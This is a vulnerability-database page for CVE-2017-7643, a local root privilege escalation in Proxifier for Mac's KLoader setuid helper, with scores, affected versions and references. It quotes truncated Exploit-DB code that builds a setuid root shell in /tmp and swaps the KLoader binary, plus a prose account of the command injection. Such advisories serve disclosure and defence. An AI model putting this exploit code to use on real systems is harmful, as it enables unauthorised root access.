CVE-2017-7643
published 2017-04-14CVE-2017-7643: Proxifier for Mac before 2.19 allows local users to gain privileges via the first parameter to the KLoader setuid program.
PriorityP343high7.8CVSS 3.1
AVLACLPRLUINSUCHIHAH
EXPLOIT
EPSS
0.97%
57.2th percentile
Proxifier for Mac before 2.19 allows local users to gain privileges via the first parameter to the KLoader setuid program.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| proxifier | proxifier | < 2.19 | 2.19 |
CVSS provenance
nvdv3.17.8HIGHCVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
nvdv2.07.2HIGHAV:L/AC:L/Au:N/C:C/I:C/A:C
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Proxifier for Mac 2.19 - Local Privilege Escalation
exploitdb·2017-12-06·CVSS 7.8
CVE-2017-7690 [HIGH] Proxifier for Mac 2.19 - Local Privilege Escalation
Proxifier for Mac 2.19 - Local Privilege Escalation
---
# With CVE-2017-7643 I disclosed a command injection vulnerablity in the KLoader
# binary that ships with Proxifier a.c
#include
int main()
{
setuid(0);
seteuid(0);
execl("/bin/bash", "bash", NULL);
return 0;
}
EOF
gcc -o /tmp/a a.c
cat > a.c
#include
#include
#include
#include
int main(int ac, char *av[])
{
if (geteuid() != 0) {
printf("KLoader: UID not set to 0\n");
return 104;
} else {
seteuid(0);
setuid(0);
chown("/tmp/a", 0, 0);
chmod("/tmp/a", strtol("4755", 0, 8));
rename("/Applications/Proxifier.app/Contents/KLoader2", "/Applications/Proxifier.app/Contents/KLoader");
chown("/Applications/Proxifier.app/Contents/KLoader", 0, 0);
chmod("/Applications/Proxifier.app/Contents/KLoader", strtol("4755", 0, 8));
execv("/Applicat
Exploit-DB
Proxifier for Mac 2.17/2.18 - Privesc Escalation
exploitdb·2017-04-11
CVE-2017-7643 Proxifier for Mac 2.17/2.18 - Privesc Escalation
Proxifier for Mac 2.17/2.18 - Privesc Escalation
---
# Source: https://m4.rkw.io/blog/cve20177643-local-root-privesc-in-proxifier-for-mac--218.html
Proxifier 2.18 (also 2.17 and possibly some earlier version) ships with a
KLoader binary which it installs suid root the first time Proxifier is run. This
binary serves a single purpose which is to load and unload Proxifier's kernel
extension.
Unfortunately it does this by taking the first parameter passed to it on the
commandline without any sanitisation and feeding it straight into system().
This means not only can you load any arbitrary kext as a non-root user but you
can also get a local root shell.
Although this is a bit of a terrible bug that shouldn't be happening in 2017,
Proxifier's developers fixed the issue in record time so th
No writeups or analysis indexed.
http://seclists.org/fulldisclosure/2017/Apr/54https://m4.rkw.io/blog/cve20177643-local-root-privesc-in-proxifier-for-mac--218.htmlhttps://www.exploit-db.com/exploits/41854/http://seclists.org/fulldisclosure/2017/Apr/54https://m4.rkw.io/blog/cve20177643-local-root-privesc-in-proxifier-for-mac--218.htmlhttps://www.exploit-db.com/exploits/41854/
2017-04-14
Published